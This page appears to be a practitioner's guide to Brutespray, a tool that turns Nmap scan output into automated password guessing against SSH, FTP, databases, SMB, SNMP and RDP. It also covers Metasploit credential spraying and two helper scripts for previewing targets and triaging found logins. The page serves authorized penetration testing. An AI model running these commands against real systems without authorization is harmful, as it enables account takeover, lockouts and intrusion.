Brutespray
Brutespray takes Nmap output (GNMAP or XML) and automatically brute-forces the services it finds, using its own default credential lists or lists you supply. It keys on the service names Nmap reports, so scans must use version detection (-sV). The Python script (brutespray.py) does not integrate with Metasploit: for each discovered service it builds and runs a Medusa command, so Medusa must be installed. Newer 2.x releases are a Go rewrite with built-in protocol implementations and a single brutespray binary; the commands on this page use the Python script's options.
Installation
Linux/Ubuntu
# From repository (Python version)
git clone https://github.com/x90skysn3k/brutespray.git
cd brutespray
pip3 install -r requirements.txt
# Make executable and put it on the PATH
chmod +x brutespray.py
sudo ln -s $(pwd)/brutespray.py /usr/local/bin/brutespray
# Kali Linux ships a package
sudo apt install brutespray
Prerequisites
# Nmap for discovery, Medusa for the guessing itself (brutespray shells out to it)
sudo apt install nmap medusa python3-pip
# Metasploit (optional): only needed to reuse recovered credentials in its modules
sudo apt install metasploit-framework
Basic Usage
Nmap Integration
# Run a version scan and save XML (-oX) or greppable (-oG) output; -f accepts either
nmap -sV -p- target.com -oX nmap_results.xml
# Run Brutespray on the Nmap results (-t = Medusa threads per host, -T = hosts attacked in parallel)
python3 brutespray.py -f nmap_results.xml -t 4 -T 2
# -f is opened as a regular file, so do not pipe "-oX -" into brutespray; write the file first, then run it
nmap -sV -p- target.com -oX nmap_results.xml && python3 brutespray.py -f nmap_results.xml -t 4
Command-Line Options
| Option | Description |
|---|---|
| -f, --file <FILE> | Nmap GNMAP or XML output file to parse (required) |
| -o, --output <DIR> | Directory for successful attempts (default: brutespray-output) |
| -s, --service <SERVICE> | Only attack this service, e.g. ssh, ftp, mysql, postgresql, smbnt, snmp |
| -t, --threads <NUM> | Medusa threads per host (default: 2) |
| -T, --hosts <NUM> | Hosts attacked concurrently (default: 1) |
| -u, --username <USER> | Single username to test |
| -U, --userlist <FILE> | Username list file |
| -p, --password <PASS> | Single password to test |
| -P, --passlist <FILE> | Password list file (used as community strings for snmp) |
| -c, --continuous | Keep guessing after a success instead of stopping for that host |
| -i, --interactive | Interactive mode: choose services and targets before starting |
| -m, --modules | List the services brutespray knows how to attack |
| -q, --quiet | Suppress the banner |
| -v, --verbose | Show Medusa's own output |
There is no port, SNMP, dry-run or Metasploit option: the port always comes from the Nmap file, SNMP is selected with -s snmp, and previewing targets means reading the scan file or using -i.
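Because brutespray decides what to attack purely from the service names in the Nmap file, the target set can be reviewed before anything touches the network. The following is an added example written for this page, not code from the brutespray project: it mirrors the -f and -s filtering with the standard library. The sample scan is constructed inline, and the Nmap-to-brutespray name table is an assumption covering a few common services, not brutespray's full list; the port filter is an extra this example adds, since brutespray has no port option.

```python
"""Preview the targets brutespray would derive from an Nmap XML file.

Added example for this page, not code from the brutespray project. It uses
only the standard library and mirrors brutespray's -f (parse the scan) and
-s (restrict to a service) behaviour, so the target list can be reviewed
before Medusa is launched.
"""
import xml.etree.ElementTree as ET

# Nmap -sV service names mapped to the service names the Python brutespray
# passes to Medusa. Assumption for this example: a handful of common
# services only, not brutespray's full list.
NMAP_TO_BRUTESPRAY = {
    "ssh": "ssh",
    "ftp": "ftp",
    "telnet": "telnet",
    "mysql": "mysql",
    "postgresql": "postgresql",
    "ms-sql-s": "mssql",
    "vnc": "vnc",
    "microsoft-ds": "smbnt",
    "netbios-ssn": "smbnt",
    "snmp": "snmp",
    "smtp": "smtp",
    "pop3": "pop3",
    "imap": "imap",
}

# Constructed sample scan: two hosts, one filtered port, one SSH daemon on a
# non-standard port, and one service brutespray has no module for (http).
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sV -oX - 10.0.0.0/30">
  <host><status state="up"/>
    <address addr="10.0.0.1" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="3306"><state state="filtered"/><service name="mysql"/></port>
    </ports>
  </host>
  <host><status state="up"/>
    <address addr="10.0.0.2" addrtype="ipv4"/>
    <address addr="00:11:22:33:44:55" addrtype="mac"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/><service name="ftp" product="vsftpd"/></port>
      <port protocol="tcp" portid="2222"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports>
  </host>
</nmaprun>
"""


def parse_targets(xml_text, services=None, port=None):
    """Return (ip, port, brutespray_service) for every open port whose Nmap
    service name maps to a brutespray service. `services` narrows the result
    like -s; `port` is an extra filter added by this example (brutespray has
    no port option: the port always comes from the scan)."""
    root = ET.fromstring(xml_text)
    targets = []
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        ip = addr.get("addr")
        for p in host.iter("port"):
            state = p.find("state")
            if state is None or state.get("state") != "open":
                continue  # filtered/closed ports are never attacked
            svc = p.find("service")
            name = NMAP_TO_BRUTESPRAY.get(svc.get("name")) if svc is not None else None
            if name is None:
                continue  # unknown or unsupported service: skipped, as brutespray does
            portnum = int(p.get("portid"))
            if services and name not in services:
                continue
            if port is not None and portnum != port:
                continue
            targets.append((ip, portnum, name))
    return targets


def plan(xml_text, services=None, port=None):
    """Group targets per brutespray service, the unit Medusa is invoked for.
    Returns {service: ["ip:port", ...]} with hosts sorted."""
    grouped = {}
    for ip, portnum, name in parse_targets(xml_text, services, port):
        grouped.setdefault(name, []).append(f"{ip}:{portnum}")
    return {name: sorted(hosts) for name, hosts in grouped.items()}


if __name__ == "__main__":
    for name, hosts in plan(SAMPLE_NMAP_XML).items():
        print(f"{name}: {', '.join(hosts)}")
```

Run it against a real scan by replacing SAMPLE_NMAP_XML with the contents of your -oX file; the filtered MySQL port and the HTTP service drop out, and the SSH daemon on 2222 is kept because Nmap identified it as ssh, which is exactly how brutespray treats it.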
Practical Examples
Basic Service Brute Force
# Scan the network for services brutespray can attack; plain -sV, no NSE brute scripts (Nmap identifies, brutespray guesses)
nmap -sV -p 21,22,445,3306,5432 192.168.1.0/24 -oX scan.xml
# Brutespray with your own lists: 10 Medusa threads per host, 5 hosts at a time
python3 brutespray.py -f scan.xml -U users.txt -P passwords.txt -t 10 -T 5
# Target a specific service
python3 brutespray.py -f scan.xml -s ssh -U users.txt -P passwords.txt
SSH Brute Force via Nmap
# Find SSH services; ssh-brute is itself a brute-forcer and would start guessing during recon, so use -sV for discovery
nmap -sV -p 22 192.168.0.0/24 -oX ssh_scan.xml
# Brutespray SSH services
python3 brutespray.py -f ssh_scan.xml -s ssh -U admin.txt -P wordlist.txt -t 4
FTP Brute Force
# Discover FTP services (plain -sV; ftp-brute would guess credentials itself)
nmap -sV -p 21 192.168.1.0/24 -oX ftp_scan.xml
# Brute force discovered FTP, anonymous login included
python3 brutespray.py -f ftp_scan.xml -s ftp -U ftp_users.txt -P ftp_passwords.txt -t 5
Database Services
# Find MySQL/PostgreSQL
nmap -sV -p 3306,5432 target.com -oX db_scan.xml
# Brute force databases
python3 brutespray.py -f db_scan.xml -U db_users.txt -P db_pass.txt -t 3
RDP Brute Force
# Scan for RDP services and collect the hosts that have it open
nmap -sV -p 3389 --open 192.168.1.0/24 -oX rdp_scan.xml -oG - | awk '/3389\/open/{print $2}' > rdp_hosts.txt
# rdp is not in the Python brutespray service list (check with -m), so brutespray skips port 3389; drive Medusa's rdp module directly
medusa -H rdp_hosts.txt -U domain_users.txt -P passwords.txt -M rdp -t 2
# Domain accounts lock out: read the lockout threshold first and keep attempts per account below it
Wordlist Selection
Credential Files
# Common usernames (printf avoids the echo -e portability problem)
printf '%s\n' admin administrator root test guest user > users.txt
# Default passwords
printf '%s\n' password 123456 admin123 test welcome > passwords.txt
# Database users
printf '%s\n' root admin sa postgres > db_users.txt
# FTP accounts (anonymous accepts any password)
printf '%s\n' anonymous ftp admin > ftp_users.txt
# With no -U/-P, brutespray falls back to the per-service defaults in its own wordlist/ directory
# Download SecLists; Usernames/ and Passwords/Default-Credentials/ are the useful starting points
git clone https://github.com/danielmiessler/SecLists.git
SNMP Enumeration
# SNMP is UDP, so discover it with a UDP scan; then select it with -s snmp (there is no --snmp flag)
nmap -sU -sV -p 161 192.168.1.0/24 -oX snmp_scan.xml
python3 brutespray.py -f snmp_scan.xml -s snmp -P snmp_strings.txt -t 8
# Custom community strings go in the password list
printf '%s\n' public private community 123456 > snmp_strings.txt
Metasploit Integration
# brutespray has no --msf option; it writes successful logins to <output dir>/<service>-success.txt
python3 brutespray.py -f scan.xml -U users.txt -P pass.txt -o brutespray-output
grep -rh "ACCOUNT FOUND" brutespray-output/
# Record a found credential in Metasploit's database, then spray it across the other hosts
msfconsole
creds add user:root password:toor host:192.168.1.10 port:22 proto:tcp service:ssh
use auxiliary/scanner/ssh/ssh_login
set RHOSTS file:discovered_hosts.txt
set USERNAME root
set PASSWORD toor
run
Advanced Techniques
Custom Service Targeting
# -p is a single password, not a port. The port comes from the Nmap file, so an SSH daemon
# on 2222 is attacked as long as -sV identified it as ssh
python3 brutespray.py -f results.xml -s ssh -U users.txt -P pass.txt
# Multiple services from a single scan: one run per service (brutespray's SMB service name is smbnt)
for svc in ssh ftp smbnt; do
python3 brutespray.py -f full_scan.xml \
-s "$svc" \
-U userlist.txt \
-P wordlist.txt
done
Handling Large Scans
# -t raises Medusa threads per host, -T attacks more hosts in parallel; spread load across hosts rather than hammering one
python3 brutespray.py -f network_scan.xml -t 5 -T 10 -U users.txt -P pass.txt
# There is no dry-run option; use interactive mode to review and pick services and targets before starting
python3 brutespray.py -f scan.xml -i
Verbose Logging
# Full Medusa output (-v) with a copy of the run log
python3 brutespray.py -f scan.xml -U users.txt -P pass.txt -v -t 5 | tee brutespray_log.txt
Workflow Example
Complete Assessment
# 1. Network reconnaissance (version detection plus enumeration scripts; no *-brute scripts)
nmap -sV --script smb-enum-shares,ssh-hostkey,mysql-info -p- 192.168.1.0/24 -oX network_assessment.xml
# 2. Run Brutespray with the lists built above
python3 brutespray.py -f network_assessment.xml \
-U users.txt \
-P passwords.txt \
-t 5 \
-T 5 \
-v
# 3. Review results (one <service>-success.txt per service in the output directory)
grep -rh "ACCOUNT FOUND" brutespray-output/
# 4. Exploitation (with proper authorization)
# Use discovered credentials with exploit modules
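Step 3 is where the run turns into findings, and grep alone misses the most useful one: a password that works on more than one host. The following is an added example written for this page, not part of brutespray. It assumes brutespray's <service>-success.txt files contain Medusa's "ACCOUNT FOUND" lines (that format is the assumption; the sample lines are constructed), de-duplicates them into a credential table, exports CSV for the report, and lists (user, password) pairs reused across hosts.

```python
"""Triage brutespray's success files.

Added example for this page, not code from brutespray. The Python brutespray
hands the guessing to Medusa and collects successes under
brutespray-output/<service>-success.txt; this example assumes those files
hold Medusa's "ACCOUNT FOUND" lines and parses them into a credential table,
a CSV export and a password-reuse report. Sample lines are constructed.
"""
import csv
import glob
import io
import os
import re

# Medusa success marker, e.g.
# ACCOUNT FOUND: [ssh] Host: 192.168.1.10 User: root Password: toor [SUCCESS]
ACCOUNT_RE = re.compile(
    r"ACCOUNT FOUND: \[(?P<service>[^\]]+)\] Host: (?P<host>\S+) "
    r"User: (?P<user>\S*) Password: (?P<password>.*?) \[SUCCESS\]"
)

# Constructed sample: a duplicate line, an anonymous FTP login with an empty
# password, a password containing a space, and a status line to be skipped.
SAMPLE_LINES = [
    "ACCOUNT FOUND: [ssh] Host: 192.168.1.10 User: root Password: toor [SUCCESS]",
    "ACCOUNT FOUND: [ssh] Host: 192.168.1.11 User: root Password: toor [SUCCESS]",
    "ACCOUNT FOUND: [ftp] Host: 192.168.1.12 User: anonymous Password:  [SUCCESS]",
    "ACCOUNT FOUND: [ssh] Host: 192.168.1.10 User: root Password: toor [SUCCESS]",
    "ACCOUNT FOUND: [mysql] Host: 192.168.1.13 User: root Password: Pa ss [SUCCESS]",
    "GENERAL: Medusa starting (constructed noise line)",
]


def parse_successes(lines):
    """Return de-duplicated (service, host, user, password) tuples in the
    order first seen; lines that are not success markers are ignored."""
    found, seen = [], set()
    for line in lines:
        m = ACCOUNT_RE.search(line)
        if m is None:
            continue
        rec = (m["service"], m["host"], m["user"], m["password"])
        if rec not in seen:
            seen.add(rec)
            found.append(rec)
    return found


def load_output_dir(path="brutespray-output"):
    """Parse every <service>-success.txt under brutespray's output directory."""
    lines = []
    for fn in sorted(glob.glob(os.path.join(path, "*-success.txt"))):
        with open(fn, encoding="utf-8", errors="replace") as fh:
            lines.extend(fh)
    return parse_successes(lines)


def reused_passwords(records):
    """Map (user, password) -> sorted hosts for pairs that worked on more than
    one host; a shared password is what turns one box into the subnet."""
    by_pair = {}
    for _service, host, user, password in records:
        by_pair.setdefault((user, password), set()).add(host)
    return {pair: sorted(hosts) for pair, hosts in by_pair.items() if len(hosts) > 1}


def to_csv(records):
    """Render the credential table as CSV text for the report."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(["service", "host", "user", "password"])
    writer.writerows(records)
    return buf.getvalue()


if __name__ == "__main__":
    recs = parse_successes(SAMPLE_LINES)
    print(to_csv(recs))
    for (user, password), hosts in reused_passwords(recs).items():
        print(f"{user}:{password!r} reused on {', '.join(hosts)}")
```

On a real run, call load_output_dir() instead of parse_successes(SAMPLE_LINES); the CSV is the artefact to hand over with the report, and the reuse map is the list of hosts to prioritise for step 4.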
Troubleshooting
Common Issues
Services not detected
# brutespray matches on the service name Nmap reports, not the port number, so the scan needs -sV.
# -A already implies -sV plus the default scripts, so either of these is enough
nmap -sV target.com -oX output.xml
nmap -A target.com -oX output.xml
# Verify the file is well-formed XML (a scan killed mid-run leaves a truncated file)
xmllint --noout nmap_results.xml
Slow performance
# -t is Medusa threads per host, -T is hosts in parallel; raise -T to go wide and keep -t moderate
python3 brutespray.py -f scan.xml -t 5 -T 10
# The per-attempt timeout belongs to Medusa; brutespray exposes no switch for it, so slow services need fewer threads, not a brutespray tweak
Authentication failures on valid credentials
# Use verbose mode to see Medusa's own error for each attempt
python3 brutespray.py -f scan.xml -v
# Check that the service accepts password authentication at all: an sshd with PasswordAuthentication no,
# or a MySQL account restricted to localhost, rejects a correct password and looks like a failed guess
ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no user@target.com
Best Practices
- Always get written authorization before testing
- Keep -t and -T low (2-5) against production systems; go higher only in a lab
- Read the lockout policy first and keep attempts per account below the threshold; domain accounts are the usual casualty
- Build targeted lists from reconnaissance (product banners, naming conventions) instead of large generic wordlists
- Test in controlled environments first
- Use unique identifiers to track test runs
- Document all discovered credentials
- Clean up after testing (remove test accounts)
- Follow responsible disclosure procedures
- Combine findings with other vulnerability assessments
Last updated: 2025-03-30 | Brutespray GitHub